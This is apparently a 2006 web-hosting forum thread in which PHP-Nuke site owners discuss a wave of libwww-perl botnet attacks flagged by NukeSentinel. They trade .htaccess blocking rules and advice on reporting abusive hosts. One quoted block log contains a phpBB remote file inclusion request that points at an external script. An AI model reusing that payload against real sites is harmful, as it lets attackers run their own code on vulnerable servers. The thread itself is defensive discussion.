| Author |
Message |
leo51
Worker
Joined: Sep 09, 2004
Posts: 105
Location: Canada
|
 Posted:
Mon Nov 13, 2006 11:17 pm |
 
|
I am trying to understand why someone continues to run these similar types of scripts on my site.
Today alone NukeSentinel 30 blocks from 30 different IPs and these must be proxies and look at the time range between 11:00 AM & 12noon there were no less than 20. The flag of the 30 IPs show Australia but a NeoTrace terminate the IPs in different US States.
The attempts increase today and that might be as a result of I blocking some ranges on Sunday evening.
This has been going on for more than four months at least there were about two blocks ever so often but whoever it is seems to have gotten bad.
QUESTION: What is the person trying to accomplish
Date & Time: 2006-11-13 09:54:54 CST GMT -0600
Blocked IP: 66.70.189.*
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: libwww-perl/5.65
Query String:
Get String:
THanks |
|
|
 
 |
|
kguske
Site Admin
Joined: Jun 04, 2004
Posts: 4887
|
| Posted:
Mon Nov 13, 2006 11:25 pm |
|
Don't waste your time trying to understand why attackers do so. This can be easily stopped by adding authentication on your modules/Forums/admin directory. If you search the forums here, you can find specific details for doing this, and it's an important protection that will provide excellent protection without setting off NukeSentinel. |
|
|
|
|
|
montego
Site Admin
Joined: Aug 29, 2004
Posts: 7487
Location: Arizona
|
| Posted:
Tue Nov 14, 2006 6:57 am |
|
|
|
|
|
gregexp
The Mouse Is Extension Of Arm
Joined: Feb 21, 2006
Posts: 1472
Location: In front of a screen....HELP! lol
|
| Posted:
Tue Nov 14, 2006 7:45 pm |
|
| leo51 wrote: | | I am trying to understand why someone continues to run these similar types of scripts on my site. |
First I will approach this with an answer, someone is more then likley letting something such as a program do this, and that does not always register when it is blocked. When it does register it will try to make the same attack but with something different, ussually the ip.
| leo51 wrote: |
QUESTION: What is the person trying to accomplish?
|
Some would say Just to know they can, and others would say to be malicious, this is more of a personal feeling and judgement on your own.
This should be the question in which both kguske and montego have stated:
How can I stop this?
They have linked you to the correct resources and I recomend to follow the instructions provided. |
|
|
  
 |
|
evaders99
Moderator
Joined: Apr 30, 2004
Posts: 2853
|
| Posted:
Wed Nov 15, 2006 12:21 am |
|
It is many bot net scripts. They are targetting all kinds of PHP injections and using an IRC script to control all of them. Hundreds.. thousands of machines are affected. And they keep searching using Google and other search engines.
Their current flaw seems to be the use of libwww-perl, but that may change. |
|
|
|
|
|
Digital-Overload
Hangin' Around
Joined: May 13, 2005
Posts: 26
|
| Posted:
Thu Nov 16, 2006 1:34 pm |
|
I Just Got 69 Emails From Sentinel With The Same stuff Pretty Much, For the Last 3 Hours Alone... and Yes, I've been getting this and the admin user injection alot of the past 5 or 6 months, I had to remove Guestbooks and set harse Permissions to users to make sure im not getting any Spam links added to news and the forums, so far the bots can register all they want, but they get deleted when it asks for my approval...., now im getting some stupid script submitting news .. lol AHmed or some shiz like that, but yeah, i got this like 100 times in the last week, and 69 just now when i checked my email, and decided to come on here and see if anyone else got hit like me... guess so...
Date & Time: 2006-11-16 09:57:37 Pacific Standard Time GMT -0800
Blocked IP: 219.93.90.33 (which i have about 345 Different IPs in the htaccess already for this type of attack)
User ID: Anonymous (1)
Reason: Abuse-Harvest
String Match: libwww-perl
--------------------
User Agent: libwww-perl/5.65
Query String:<SITE ROOT><A BUnch Of Subfolders>/admin_styles.php?phpbb_root_path=http://www.superlist.gen.tr/lol1.txt?
Get String: <SITE ROOT> <A Bunch Of Subfolders>/admin_styles.php?phpbb_root_path=http://www.superlist.gen.tr/lol1.txt?
Post String: <SITE ROOT> <BUNCH OF Sub Folders>/admin_styles.php
Forwarded For: none
Client IP: none
Remote Address: 219.93.90.33
Remote Port: none
Request Method: GET |
|
|
|
|
|
jakec
Moderator
Joined: Feb 06, 2006
Posts: 1853
Location: United Kingdom
|
| Posted:
Thu Nov 16, 2006 1:46 pm |
|
See this post about how to block this type of attack before it gets to Sentinel: |
|
|
|
|
|
64bitguy
The Mouse Is Extension Of Arm
Joined: Mar 06, 2004
Posts: 1140
Location: Manchester, NH USA
|
| Posted:
Thu Nov 16, 2006 2:07 pm |
|
I believe you are going to start seeing a lot more abuse out of Turkey.
My Personal position is to completely block the entire country either through NukeSentinel or via .htaccess or both, but that's just me. As their Government doesn't care about people hosting abusive malicous code, I don't care about giving them any access or allowing their referers.
.htaccess
| Code: | RewriteCond %{HTTP_REFERER} gen\.tr [NC, OR]
RewriteCond %{HTTP_REFERER} com\.tr [NC, OR]
RewriteCond %{HTTP_REFERER} org\.tr [NC, OR]
RewriteCond %{HTTP_REFERER} net\.tr [NC] |
You get the idea. There are probabaly easier ways to do this, but it works for me. |
|
|
|
|
|
evaders99
Moderator
Joined: Apr 30, 2004
Posts: 2853
|
| Posted:
Thu Nov 16, 2006 7:09 pm |
|
You are seeing a lot of abuse from across the world. It is due to many of the botnet scripts with hundreds or thousands of compromised servers. Turkey seems to be the choice for the direct script kiddies, but these libwww-perl attacks are much more than that. |
|
|
|
|
|
technocrat
Involved
Joined: Jul 07, 2005
Posts: 492
|
| Posted:
Fri Nov 17, 2006 10:50 am |
|
Blocking turkey is not going to help much in this situation. The problem is that someone from one of the hacking teams wrote the perl script to exploit this hole. Then a script kiddie website wrote a long set of directions on every step of how to use this.
Then the biggest script kiddie site out there took those directions an updated them (including how to use proxies) and posted them on their forums. It EXPLODED after that. Now every script kiddie with even a small amount of knowledge and a few proxies ips can use this.
On the main Evo site sentinel blocks 200 a day. The most effective solution has been to use the .htaccess perl rewrite. It completely took it off the radar. |
|
|
|
|
|
Guardian2003
Site Admin
Joined: Aug 28, 2003
Posts: 4868
|
| Posted:
Fri Nov 17, 2006 11:02 am |
|
I was getting around 200 emails too, over a couple of hours each day. |
|
|
|
|
|
64bitguy
The Mouse Is Extension Of Arm
Joined: Mar 06, 2004
Posts: 1140
Location: Manchester, NH USA
|
| Posted:
Fri Nov 17, 2006 3:02 pm |
|
I agree that Turkey isn't "alone" in this regard. Personally, I block quite a few countries simply because:
a) They have nothing to offer to my community of users.
b) They only want access for abusive purposes including these illegal attaccks
In either case, thank you IP2C and other tools that help in blocking access. I think my original point was there is more than one way to skin a cat (thank you Apache).
As a couple of thoughts:
1) I see the strengths in blocking libwww-perl; however, keep in mind that if you spend your time doing site diagnostics (as I do), this function can be extremely useful, especially when examining compliance and statistical information regarding your site. (If you ever block yourself when running a W3C Validator, this is why! Don't forget to remove the blocker when doing that kind of work).
2) One of the benefits to seeing an attack like this is the ability to take action regarding it. While seeking revenge is stupid, people need to remember that these kinds of malicious probes and intrusions are a violation of United States law; specifically, .
Please remember that under the law, the company hosting is just as guilty as the user, once that information has been identified in writing to the host.
In other words, when you see ANYONE hosting malicious scripts, you should notify the host, remind them of the law and also threaten punitive action of $10,000.00 per incident as is your right under the law.
Does this work? Darn right it does. I have reported domains after seeing extensive attacks. I do this by looking up the host info at and then forward off a copy of the abuse message with a nice little form letter that I have already prepared to the host of the abusive scripts. I know of at least 50 instances where my actions had domains shut-down. It may not solve the problem, but it does hurt the attackers pocket-book as illegal abuse voids a hosting agreement. Remember that the is there for you too. People often complain about the hassle, but they have teeth and don't mind using them. Stealing administration information and passwords is a serious crime. It should be treated as such.
I can only emphasize that people should simply not lay down when attacked, fight back where you can and block where you don't want to bother. Obviously, a host in Turkey could care less about the law, which is why I simply choose to block the country entirely, as well as many other countries that operate in a similar manner of Internet lawlessness.
Finally, (and I guess this goes without saying... but regardless) everyone should also be checking their sites to ensure software is adequately patched against the results of a successful attack. |
|
|
|
|
|
leo51
Worker
Joined: Sep 09, 2004
Posts: 105
Location: Canada
|
| Posted:
Fri Nov 17, 2006 11:05 pm |
|
OK, Thanks guys for all of the input. I now have a better understanding of what has being going on. And yes I was blocking these IP ranges but it started to be a nuisance and taking up too much of my time. Also, I was thinking that some-hater was again trying to let me reduce my numbers once I block so many countries and ranges.
About a year and a half ago, I had to block-out almost the whole of Europe and Florida and start giving individuals access once they send an email with their IP. One guy living in Europe and one in Florida (two friends) went on a rampage-posting drunk all over my forms, guestbook, request form, forums just about anywhere on the sites where it was possible to post. They just create a new users and came back; use proxies, the ripe network and dialup.
Anyway, it was good that I made this post it help me understand a whole lot about the situation.
Again, Many Thanks |
|
|
|
|
|
evaders99
Moderator
Joined: Apr 30, 2004
Posts: 2853
|
| Posted:
Sun Nov 19, 2006 8:34 pm |
|
Yep definitely report them. Any site that can be secured will stop hundreds of attempts against other hosts. Mostly, these sites are compromised and the host may not even know it. So use domaintools or whatever you prefer, send an email to the technical contacts, and hope they do something |
|
|
|
|
|
|
|
|
|
![[Valid RSS]](http://ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
:: 
::
